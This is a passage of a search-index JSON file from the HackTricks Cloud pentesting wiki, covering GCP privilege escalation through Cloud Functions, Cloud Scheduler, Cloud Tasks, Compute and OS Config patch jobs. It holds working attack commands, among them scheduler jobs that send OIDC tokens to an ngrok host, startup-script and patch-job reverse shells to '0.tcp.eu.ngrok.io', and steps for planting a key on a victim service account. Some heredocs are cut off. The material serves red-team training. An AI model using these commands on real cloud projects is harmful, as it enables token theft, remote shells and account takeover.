874":{"body":65,"breadcrumbs":13,"title":4},"875":{"body":62,"breadcrumbs":11,"title":2},"876":{"body":96,"breadcrumbs":12,"title":3},"877":{"body":61,"breadcrumbs":13,"title":4},"878":{"body":10,"breadcrumbs":10,"title":1},"879":{"body":136,"breadcrumbs":13,"title":4},"88":{"body":81,"breadcrumbs":7,"title":2},"880":{"body":61,"breadcrumbs":13,"title":4},"881":{"body":7,"breadcrumbs":10,"title":1},"882":{"body":122,"breadcrumbs":10,"title":1},"883":{"body":338,"breadcrumbs":11,"title":2},"884":{"body":78,"breadcrumbs":11,"title":2},"885":{"body":82,"breadcrumbs":10,"title":1},"886":{"body":128,"breadcrumbs":10,"title":1},"887":{"body":61,"breadcrumbs":13,"title":4},"888":{"body":14,"breadcrumbs":11,"title":2},"889":{"body":13,"breadcrumbs":11,"title":2},"89":{"body":64,"breadcrumbs":6,"title":1},"890":{"body":14,"breadcrumbs":12,"title":3},"891":{"body":32,"breadcrumbs":12,"title":3},"892":{"body":14,"breadcrumbs":10,"title":1},"893":{"body":15,"breadcrumbs":12,"title":3},"894":{"body":20,"breadcrumbs":10,"title":1},"895":{"body":10,"breadcrumbs":10,"title":1},"896":{"body":13,"breadcrumbs":10,"title":1},"897":{"body":16,"breadcrumbs":10,"title":1},"898":{"body":20,"breadcrumbs":10,"title":1},"899":{"body":18,"breadcrumbs":10,"title":1},"9":{"body":176,"breadcrumbs":6,"title":3},"90":{"body":61,"breadcrumbs":13,"title":4},"900":{"body":12,"breadcrumbs":10,"title":1},"901":{"body":10,"breadcrumbs":10,"title":1},"902":{"body":162,"breadcrumbs":10,"title":1},"903":{"body":61,"breadcrumbs":13,"title":4},"904":{"body":15,"breadcrumbs":10,"title":1},"905":{"body":10,"breadcrumbs":10,"title":1},"906":{"body":62,"breadcrumbs":10,"title":1},"907":{"body":26,"breadcrumbs":10,"title":1},"908":{"body":10,"breadcrumbs":10,"title":1},"909":{"body":32,"breadcrumbs":10,"title":1},"91":{"body":61,"breadcrumbs":13,"title":4},"910":{"body":34,"breadcrumbs":10,"title":1},"911":{"body":12,"breadcrumbs":10,"title":1},"912":{"body":89,"breadcrumbs":10,"title":1},"913":{"body":61,"breadcrumbs":13,"title":4},"914":{"body":9,"breadcrumbs":10,"title":1},"915":{"body":23,"breadcrumbs":10,"title":1},"916":{"body":17,"breadcrumbs":10,"title":1},"917":{"body":22,"breadcrumbs":10,"title":1},"918":{"body":23,"breadcrumbs":10,"title":1},"919":{"body":6,"breadcrumbs":10,"title":1},"92":{"body":61,"breadcrumbs":15,"title":5},"920":{"body":58,"breadcrumbs":12,"title":3},"921":{"body":17,"breadcrumbs":10,"title":1},"922":{"body":24,"breadcrumbs":10,"title":1},"923":{"body":8,"breadcrumbs":10,"title":1},"924":{"body":46,"breadcrumbs":11,"title":2},"925":{"body":23,"breadcrumbs":10,"title":1},"926":{"body":8,"breadcrumbs":10,"title":1},"927":{"body":82,"breadcrumbs":11,"title":2},"928":{"body":61,"breadcrumbs":13,"title":4},"929":{"body":9,"breadcrumbs":10,"title":1},"93":{"body":97,"breadcrumbs":12,"title":2},"930":{"body":86,"breadcrumbs":10,"title":1},"931":{"body":61,"breadcrumbs":13,"title":4},"932":{"body":6,"breadcrumbs":10,"title":1},"933":{"body":22,"breadcrumbs":10,"title":1},"934":{"body":23,"breadcrumbs":10,"title":1},"935":{"body":22,"breadcrumbs":10,"title":1},"936":{"body":15,"breadcrumbs":10,"title":1},"937":{"body":71,"breadcrumbs":10,"title":1},"938":{"body":61,"breadcrumbs":21,"title":11},"939":{"body":101,"breadcrumbs":11,"title":1},"94":{"body":93,"breadcrumbs":14,"title":4},"940":{"body":70,"breadcrumbs":14,"title":4},"941":{"body":177,"breadcrumbs":17,"title":7},"942":{"body":51,"breadcrumbs":16,"title":6},"943":{"body":46,"breadcrumbs":15,"title":5},"944":{"body":37,"breadcrumbs":13,"title":3},"945":{"body":9,"breadcrumbs":12,"title":2},"946":{"body":75,"breadcrumbs":11,"title":1},"947":{"body":61,"breadcrumbs":13,"title":4},"948":{"body":5,"breadcrumbs":10,"title":1},"949":{"body":71,"breadcrumbs":11,"title":2},"95":{"body":63,"breadcrumbs":16,"title":6},"950":{"body":61,"breadcrumbs":13,"title":4},"951":{"body":9,"breadcrumbs":11,"title":2},"952":{"body":166,"breadcrumbs":12,"title":3},"953":{"body":61,"breadcrumbs":8,"title":3},"954":{"body":182,"breadcrumbs":9,"title":4},"955":{"body":16,"breadcrumbs":9,"title":4},"956":{"body":122,"breadcrumbs":8,"title":3},"957":{"body":50,"breadcrumbs":8,"title":3},"958":{"body":15,"breadcrumbs":10,"title":5},"959":{"body":79,"breadcrumbs":6,"title":1},"96":{"body":66,"breadcrumbs":15,"title":5},"960":{"body":61,"breadcrumbs":11,"title":3},"961":{"body":57,"breadcrumbs":9,"title":1},"962":{"body":17,"breadcrumbs":13,"title":5},"963":{"body":59,"breadcrumbs":9,"title":1},"964":{"body":30,"breadcrumbs":10,"title":2},"965":{"body":28,"breadcrumbs":10,"title":2},"966":{"body":72,"breadcrumbs":14,"title":6},"967":{"body":61,"breadcrumbs":11,"title":3},"968":{"body":9,"breadcrumbs":10,"title":2},"969":{"body":88,"breadcrumbs":22,"title":14},"97":{"body":55,"breadcrumbs":12,"title":2},"970":{"body":104,"breadcrumbs":11,"title":3},"971":{"body":28,"breadcrumbs":17,"title":9},"972":{"body":20,"breadcrumbs":10,"title":2},"973":{"body":23,"breadcrumbs":10,"title":2},"974":{"body":67,"breadcrumbs":12,"title":4},"975":{"body":96,"breadcrumbs":13,"title":5},"976":{"body":61,"breadcrumbs":13,"title":4},"977":{"body":9,"breadcrumbs":11,"title":2},"978":{"body":634,"breadcrumbs":10,"title":1},"979":{"body":61,"breadcrumbs":11,"title":3},"98":{"body":75,"breadcrumbs":11,"title":1},"980":{"body":5,"breadcrumbs":9,"title":1},"981":{"body":121,"breadcrumbs":10,"title":2},"982":{"body":61,"breadcrumbs":11,"title":3},"983":{"body":7,"breadcrumbs":9,"title":1},"984":{"body":30,"breadcrumbs":10,"title":2},"985":{"body":24,"breadcrumbs":10,"title":2},"986":{"body":64,"breadcrumbs":10,"title":2},"987":{"body":27,"breadcrumbs":9,"title":1},"988":{"body":35,"breadcrumbs":10,"title":2},"989":{"body":27,"breadcrumbs":9,"title":1},"99":{"body":70,"breadcrumbs":10,"title":4},"990":{"body":187,"breadcrumbs":12,"title":4},"991":{"body":61,"breadcrumbs":11,"title":3},"992":{"body":95,"breadcrumbs":12,"title":4},"993":{"body":61,"breadcrumbs":11,"title":3},"994":{"body":9,"breadcrumbs":9,"title":1},"995":{"body":127,"breadcrumbs":10,"title":2},"996":{"body":26,"breadcrumbs":9,"title":1},"997":{"body":27,"breadcrumbs":9,"title":1},"998":{"body":72,"breadcrumbs":9,"title":1},"999":{"body":61,"breadcrumbs":11,"title":3}},"docs":{"0":{"body":"Reading time: 3 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos. Hacktricks logos & motion designed by @ppieranacho .","breadcrumbs":"HackTricks Cloud » HackTricks Cloud","id":"0","title":"HackTricks Cloud"},"1":{"body":"bash # Download latest version of hacktricks cloud\\ngit clone https://github.com/HackTricks-wiki/hacktricks-cloud # Select the language you want to use\\nexport LANG=\\"master\\" # Leave master for English\\n# \\"af\\" for Afrikaans\\n# \\"de\\" for German\\n# \\"el\\" for Greek\\n# \\"es\\" for Spanish\\n# \\"fr\\" for French\\n# \\"hi\\" for Hindi\\n# \\"it\\" for Italian\\n# \\"ja\\" for Japanese\\n# \\"ko\\" for Korean\\n# \\"pl\\" for Polish\\n# \\"pt\\" for Portuguese\\n# \\"sr\\" for Serbian\\n# \\"sw\\" for Swahili\\n# \\"tr\\" for Turkish\\n# \\"uk\\" for Ukrainian\\n# \\"zh\\" for Chinese # Run the docker container indicating the path to the hacktricks-cloud folder\\ndocker run -d --rm --platform linux/amd64 -p 3377:3000 --name hacktricks_cloud -v $(pwd)/hacktricks-cloud:/app ghcr.io/hacktricks-wiki/hacktricks-cloud/translator-image bash -c \\"mkdir -p ~/.ssh && ssh-keyscan -H github.com >> ~/.ssh/known_hosts && cd /app && git checkout $LANG && git pull && MDBOOK_PREPROCESSOR__HACKTRICKS__ENV=dev mdbook serve --hostname 0.0.0.0\\" Your local copy of HackTricks Cloud will be available at http://localhost:3377 after a minute.","breadcrumbs":"HackTricks Cloud » Run HackTricks Cloud Locally","id":"1","title":"Run HackTricks Cloud Locally"},"10":{"body":"The most common way to define a pipeline, is by using a CI configuration file hosted in the repository the pipeline builds. This file describes the order of executed jobs, conditions that affect the flow, and build environment settings. These files typically have a consistent name and format, for example — Jenkinsfile (Jenkins), .gitlab-ci.yml (GitLab), .circleci/config.yml (CircleCI), and the GitHub Actions YAML files located under .github/workflows. When triggered, the pipeline job pulls the code from the selected source (e.g. commit / branch), and runs the commands specified in the CI configuration file against that code. Therefore the ultimate goal of the attacker is to somehow compromise those configuration files or the commands they execute .","breadcrumbs":"Pentesting CI/CD Methodology » Pipelines Pentesting Methodology","id":"10","title":"Pipelines Pentesting Methodology"},"100":{"body":"You fork a public repository You commit code to your fork You delete your fork caution The data commited in the deleted fork is still accessible.","breadcrumbs":"Github Security » Accessible Deleted Data in Github » Accessing Deleted Fork Data","id":"100","title":"Accessing Deleted Fork Data"},"1000":{"body":"More information about Cloud Functions: GCP - Cloud Functions Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » cloudfunctions","id":"1000","title":"cloudfunctions"},"1001":{"body":"An attacker with these privileges can create a new Cloud Function with arbitrary (malicious) code and assign it a Service Account . Then, leak the Service Account token from the metadata to escalate privileges to it. Some privileges to trigger the function might be required. Exploit scripts for this method can be found here and here and the prebuilt .zip file can be found here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » cloudfunctions.functions.create , cloudfunctions.functions.sourceCodeSet , iam.serviceAccounts.actAs","id":"1001","title":"cloudfunctions.functions.create , cloudfunctions.functions.sourceCodeSet , iam.serviceAccounts.actAs"},"1002":{"body":"An attacker with these privileges can modify the code of a Function and even modify the service account attached with the goal of exfiltrating the token. caution In order to deploy cloud functions you will also need actAs permissions over the default compute service account or over the service account that is used to build the image. Some extra privileges like .call permission for version 1 cloudfunctions or the role role/run.invoker to trigger the function might be required. bash # Create new code\\ntemp_dir=$(mktemp -d) cat > $temp_dir/main.py < $temp_dir/requirements.txt zip -r $temp_dir/function.zip $temp_dir/main.py $temp_dir/requirements.txt # Update code\\ngcloud functions deploy \\\\ --runtime python312 \\\\ --source $temp_dir \\\\ --entry-point main \\\\ --service-account @$PROJECT_ID.iam.gserviceaccount.com \\\\ --trigger-http \\\\ --allow-unauthenticated # Get SA token calling the new function code\\ngcloud functions call caution If you get the error Permission \'run.services.setIamPolicy\' denied on resource... is because you are using the --allow-unauthenticated param and you don\'t have enough permissions for it. The exploit script for this method can be found here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » cloudfunctions.functions.update , cloudfunctions.functions.sourceCodeSet , iam.serviceAccounts.actAs","id":"1002","title":"cloudfunctions.functions.update , cloudfunctions.functions.sourceCodeSet , iam.serviceAccounts.actAs"},"1003":{"body":"With this permission you can get a signed URL to be able to upload a file to a function bucket (but the code of the function won\'t be changed, you still need to update it) bash # Generate the URL\\ncurl -X POST https://cloudfunctions.googleapis.com/v2/projects/{project-id}/locations/{location}/functions:generateUploadUrl \\\\\\n-H \\"Authorization: Bearer $(gcloud auth application-default print-access-token)\\" \\\\\\n-H \\"Content-Type: application/json\\" \\\\\\n-d \'{}\' Not really sure how useful only this permission is from an attackers perspective, but good to know.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » cloudfunctions.functions.sourceCodeSet","id":"1003","title":"cloudfunctions.functions.sourceCodeSet"},"1004":{"body":"Give yourself any of the previous .update or .create privileges to escalate.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » cloudfunctions.functions.setIamPolicy , iam.serviceAccounts.actAs","id":"1004","title":"cloudfunctions.functions.setIamPolicy , iam.serviceAccounts.actAs"},"1005":{"body":"Only having cloudfunctions permissions, without iam.serviceAccounts.actAs you won\'t be able to update the function SO THIS IS NOT A VALID PRIVESC.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » cloudfunctions.functions.update","id":"1005","title":"cloudfunctions.functions.update"},"1006":{"body":"If you have read and write access over the bucket you can monitor changes in the code and whenever an update in the bucket happens you can update the new code with your own code that the new version of the Cloud Function will be run with the submitted backdoored code. You can check more about the attack in: GCP - Storage Privesc However, you cannot use this to pre-compromise third party Cloud Functions because if you create the bucket in your account and give it public permissions so the external project can write over it, you get the following error: caution However, this could be used for DoS attacks.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » Read & Write Access over the bucket","id":"1006","title":"Read & Write Access over the bucket"},"1007":{"body":"When a Cloud Function is created a new docker image is pushed to the Artifact Registry of the project. I tried to modify the image with a new one, and even delete the current image (and the cache image) and nothing changed, the cloud function continue working. Therefore, maybe it might be possible to abuse a Race Condition attack like with the bucket to change the docker container that will be run but just modifying the stored image isn\'t possible to compromise the Cloud Function .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » Read & Write Access over Artifact Registry","id":"1007","title":"Read & Write Access over Artifact Registry"},"1008":{"body":"https://rhinosecuritylabs.com/gcp/privilege-escalation-google-cloud-platform-part-1/ tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudfunctions Privesc » References","id":"1008","title":"References"},"1009":{"body":"Reading time: 2 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudidentity Privesc » GCP - Cloudidentity Privesc","id":"1009","title":"GCP - Cloudidentity Privesc"},"101":{"body":"You have a public repo on GitHub. A user forks your repo. You commit data after they fork it (and they never sync their fork with your updates). You delete the entire repo. caution Even if you deleted your repo, all the changes made to it are still accessible through the forks.","breadcrumbs":"Github Security » Accessible Deleted Data in Github » Accessing Deleted Repo Data","id":"101","title":"Accessing Deleted Repo Data"},"1010":{"body":"For more information about the cloudidentity service, check this page: GCP - IAM, Principals & Org Policies Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudidentity Privesc » Cloudidentity","id":"1010","title":"Cloudidentity"},"1011":{"body":"If your user has enough permissions or the group is misconfigured, he might be able to make himself a member of a new group: bash gcloud identity groups memberships add --group-email --member-email [--roles OWNER]\\n# If --roles isn\'t specified you will get MEMBER","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudidentity Privesc » Add yourself to a group","id":"1011","title":"Add yourself to a group"},"1012":{"body":"If your user has enough permissions or the group is misconfigured, he might be able to make himself OWNER of a group he is a member of: bash # Check the current membership level\\ngcloud identity groups memberships describe --member-email --group-email # If not OWNER try\\ngcloud identity groups memberships modify-membership-roles --group-email --member-email --add-roles=OWNER tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloudidentity Privesc » Modify group membership","id":"1012","title":"Modify group membership"},"1013":{"body":"Reading time: 5 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Scheduler Privesc » GCP - Cloud Scheduler Privesc","id":"1013","title":"GCP - Cloud Scheduler Privesc"},"1014":{"body":"More information in: GCP - Cloud Scheduler Enum","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Scheduler Privesc » Cloud Scheduler","id":"1014","title":"Cloud Scheduler"},"1015":{"body":"An attacker with these permissions could exploit Cloud Scheduler to authenticate cron jobs as a specific Service Account . By crafting an HTTP POST request, the attacker schedules actions, like creating a Storage bucket, to execute under the Service Account\'s identity. This method leverages the Scheduler\'s ability to target *.googleapis.com endpoints and authenticate requests , allowing the attacker to manipulate Google API endpoints directly using a simple gcloud command. Contact any google API viagoogleapis.com with OAuth token header Create a new Storage bucket: bash gcloud scheduler jobs create http test --schedule=\'* * * * *\' --uri=\'https://storage.googleapis.com/storage/v1/b?project=\' --message-body \\"{\'name\':\'new-bucket-name\'}\\" --oauth-service-account-email 111111111111-compute@developer.gserviceaccount.com --headers \\"Content-Type=application/json\\" --location us-central1 To escalate privileges, an attacker merely crafts an HTTP request targeting the desired API, impersonating the specified Service Account Exfiltrate OIDC service account token bash gcloud scheduler jobs create http test --schedule=\'* * * * *\' --uri=\'https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app\' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience \'...\'] # Listen in the ngrok address to get the OIDC token in clear text. If you need to check the HTTP response you might just t ake a look at the logs of the execution .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Scheduler Privesc » cloudscheduler.jobs.create , iam.serviceAccounts.actAs, (cloudscheduler.locations.list)","id":"1015","title":"cloudscheduler.jobs.create , iam.serviceAccounts.actAs, (cloudscheduler.locations.list)"},"1016":{"body":"Like in the previous scenario it\'s possible to update an already created scheduler to steal the token or perform actions. For example: bash gcloud scheduler jobs update http test --schedule=\'* * * * *\' --uri=\'https://87fd-2a02-9130-8532-2765-ec9f-cba-959e-d08a.ngrok-free.app\' --oidc-service-account-email 111111111111-compute@developer.gserviceaccount.com [--oidc-token-audience \'...\'] # Listen in the ngrok address to get the OIDC token in clear text. Another example to upload a private key to a SA and impersonate it: bash # Generate local private key\\nopenssl req -x509 -nodes -newkey rsa:2048 -days 365 \\\\ -keyout /tmp/private_key.pem \\\\ -out /tmp/public_key.pem \\\\ -subj \\"/CN=unused\\" # Remove last new line character of the public key\\nfile_size=$(wc -c < /tmp/public_key.pem)\\nnew_size=$((file_size - 1))\\ntruncate -s $new_size /tmp/public_key.pem # Update scheduler to upload the key to a SA\\n## For macOS: REMOVE THE `-w 0` FROM THE BASE64 COMMAND\\ngcloud scheduler jobs update http scheduler_lab_1 \\\\ --schedule=\'* * * * *\' \\\\ --uri=\\"https://iam.googleapis.com/v1/projects/$PROJECT_ID/serviceAccounts/victim@$PROJECT_ID.iam.gserviceaccount.com/keys:upload?alt=json\\" \\\\ --message-body=\\"{\\\\\\"publicKeyData\\\\\\": \\\\\\"$(cat /tmp/public_key.pem | base64 -w 0)\\\\\\"}\\" \\\\ --update-headers \\"Content-Type=application/json\\" \\\\ --location us-central1 \\\\ --oauth-service-account-email privileged@$PROJECT_ID.iam.gserviceaccount.com # Wait 1 min\\nsleep 60 # Check the logs to check it worked\\ngcloud logging read \'resource.type=\\"cloud_scheduler_job\\" AND resource.labels.job_id=\\"scheduler_lab_1\\" AND resource.labels.location=\\"us-central1\\"\\njsonPayload.@type=\\"type.googleapis.com/google.cloud.scheduler.logging.AttemptFinished\\"\' --limit 10 --project --format=json ## If any \'\\"status\\": 200\' it means it worked!\\n## Note that this scheduler will be executed every minute and after a key has been created, all the other attempts to submit the same key will throw a: \\"status\\": 400 # Build the json to contact the SA\\n## Get privatekey in json format\\nfile_content=$(<\\"/tmp/private_key.pem\\")\\nprivate_key_json=$(jq -Rn --arg str \\"$file_content\\" \'$str\') ## Get ID of the generated key\\ngcloud iam service-accounts keys list --iam-account=victim@$PROJECT_ID.iam.gserviceaccount.com # Create the json in a file\\n## NOTE that you need to export your project-id in the env var PROJECT_ID\\n## and that this script is expecting the key ID to be the first one (check the `head`)\\nexport PROJECT_ID=...\\ncat > /tmp/lab.json < \\\\ --url \'https://.us-central1.run.app\' \\\\ --method POST \\\\ --header \'X-Hello: world\' \\\\ --body-content \'{\\"hello\\":\\"world\\"}\' \\\\ --oidc-service-account-email @.iam.gserviceaccount.com","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » cloudtasks.tasks.create, iam.serviceAccounts.actAs","id":"1020","title":"cloudtasks.tasks.create, iam.serviceAccounts.actAs"},"1021":{"body":"An attacker with these permissions can run existing scheduled tasks without having permissions on the service account associated with the task. This allows executing tasks that were previously created with higher privileged service accounts. bash gcloud tasks run projects//locations/us-central1/queues//tasks/ The principal executing this command doesn\'t need iam.serviceAccounts.actAs permission on the task\'s service account. However, this only allows running existing tasks - it doesn\'t grant the ability to create or modify tasks.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » cloudtasks.tasks.run, cloudtasks.tasks.list","id":"1021","title":"cloudtasks.tasks.run, cloudtasks.tasks.list"},"1022":{"body":"An attacker with this permission can grant themselves or other principals Cloud Tasks roles on specific queues, potentially escalating to roles/cloudtasks.admin which includes the ability to create and run tasks. bash gcloud tasks queues add-iam-policy-binding \\\\ \\\\ --location us-central1 \\\\ --member serviceAccount:@.iam.gserviceaccount.com \\\\ --role roles/cloudtasks.admin This allows the attacker to grant full Cloud Tasks admin permissions on the queue to any service account they control.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » cloudtasks.queues.setIamPolicy","id":"1022","title":"cloudtasks.queues.setIamPolicy"},"1023":{"body":"Google Cloud Tasks Documentation tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Cloud Tasks Privesc » References","id":"1023","title":"References"},"1024":{"body":"Reading time: 6 minutes tip Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE) Support HackTricks Check the subscription plans ! Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live . Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » GCP - Compute Privesc","id":"1024","title":"GCP - Compute Privesc"},"1025":{"body":"For more information about Compute and VPC (netowork) in GCP check: GCP - Compute Enum caution Note that to perform all the privilege escalation atacks that require to modify the metadata of the instance (like adding new users and SSH keys) it\'s needed that you have actAs permissions over the SA attached to the instance , even if the SA is already attached!","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » Compute","id":"1025","title":"Compute"},"1026":{"body":"With that permission you can modify the metadata information of an instance and change the authorized keys of a user , or create a new user with sudo permissions. Therefore, you will be able to exec via SSH into any VM instance and steal the GCP Service Account the Instance is running with. Limitations: Note that GCP Service Accounts running in VM instances by default have a very limited scope You will need to be able to contact the SSH server to login For more information about how to exploit this permission check: GCP - Add Custom SSH Metadata You could aslo perform this attack by adding new startup-script and rebooting the instance: bash gcloud compute instances add-metadata my-vm-instance \\\\ --metadata startup-script=\'#!/bin/bash\\nbash -i >& /dev/tcp/0.tcp.eu.ngrok.io/18347 0>&1 &\' gcloud compute instances reset my-vm-instance","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.projects.setCommonInstanceMetadata","id":"1026","title":"compute.projects.setCommonInstanceMetadata"},"1027":{"body":"This permission gives the same privileges as the previous permission but over a specific instances instead to a whole project. The same exploits and limitations as for the previous section applies .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.setMetadata","id":"1027","title":"compute.instances.setMetadata"},"1028":{"body":"This kind of permission will allow you to grant yourself a role with the previous permissions and escalate privileges abusing them. Here is an example adding roles/compute.admin to a Service Account: bash export SERVER_SERVICE_ACCOUNT=YOUR_SA\\nexport INSTANCE=YOUR_INSTANCE\\nexport ZONE=YOUR_INSTANCE_ZONE cat < policy.json\\nbindings:\\n- members: - serviceAccount:$SERVER_SERVICE_ACCOUNT role: roles/compute.admin\\nversion: 1\\nEOF gcloud compute instances set-iam-policy $INSTANCE policy.json --zone=$ZONE","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.setIamPolicy","id":"1028","title":"compute.instances.setIamPolicy"},"1029":{"body":"If OSLogin is enabled in the instance , with this permission you can just run gcloud compute ssh [INSTANCE] and connect to the instance. You won\'t have root privs inside the instance. tip In order to successfully login with this permission inside the VM instance, you need to have the iam.serviceAccounts.actAs permission over the SA atatched to the VM.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.osLogin","id":"1029","title":"compute.instances.osLogin"},"103":{"body":"The same blog post propose 2 options:","breadcrumbs":"Github Security » Accessible Deleted Data in Github » How to discover commits from deleted/hidden forks","id":"103","title":"How to discover commits from deleted/hidden forks"},"1030":{"body":"If OSLogin is enabled in the instanc e, with this permission you can just run gcloud compute ssh [INSTANCE] and connect to the instance. You will have root privs inside the instance. tip In order to successfully login with this permission inside the VM instance, you need to have the iam.serviceAccounts.actAs permission over the SA atatched to the VM.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.osAdminLogin","id":"1030","title":"compute.instances.osAdminLogin"},"1031":{"body":"It\'s possible to create a virtual machine with an assigned Service Account and steal the token of the service account accessing the metadata to escalate privileges to it. The exploit script for this method can be found here .","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.instances.create,iam.serviceAccounts.actAs, compute.disks.create, compute.instances.create, compute.instances.setMetadata, compute.instances.setServiceAccount, compute.subnetworks.use, compute.subnetworks.useExternalIp","id":"1031","title":"compute.instances.create,iam.serviceAccounts.actAs, compute.disks.create, compute.instances.create, compute.instances.setMetadata, compute.instances.setServiceAccount, compute.subnetworks.use, compute.subnetworks.useExternalIp"},"1032":{"body":"If you have the osconfig.patchDeployments.create or osconfig.patchJobs.exec permissions you can create a patch job or deployment . This will enable you to move laterally in the environment and gain code execution on all the compute instances within a project. Note that at the moment you don\'t need actAs permission over the SA attached to the instance. If you want to manually exploit this you will need to create either a patch job or deployment . For a patch job run: python cat > /tmp/patch-job.sh <& /dev/tcp/0.tcp.eu.ngrok.io/18442 0>&1\\nEOF gsutil cp /tmp/patch-job.sh gs://readable-bucket-by-sa-in-instance/patch-job.sh # Get the generation number\\ngsutil ls -a gs://readable-bucket-by-sa-in-instance gcloud --project=$PROJECT_ID compute os-config patch-jobs execute \\\\ --instance-filter-names=zones/us-central1-a/instances/ \\\\ --pre-patch-linux-executable=gs://readable-bucket-by-sa-in-instance/patch-job.sh# \\\\ --reboot-config=never \\\\ --display-name=\\"Managed Security Update\\" \\\\ --duration=300s To deploy a patch deployment: bash gcloud compute os-config patch-deployments create ... The tool patchy could been used in the past for exploiting this misconfiguration (but now it\'s not working). An attacker could also abuse this for persistence.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » osconfig.patchDeployments.create | osconfig.patchJobs.exec","id":"1032","title":"osconfig.patchDeployments.create | osconfig.patchJobs.exec"},"1033":{"body":"Grant yourself extra permissions to compute Image.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » compute.machineImages.setIamPolicy","id":"1033","title":"compute.machineImages.setIamPolicy"},"1034":{"body":"Grant yourself extra permissions to a disk snapshot.","breadcrumbs":"GCP Pentesting » GCP - Privilege Escalation » GCP - Compute Privesc » 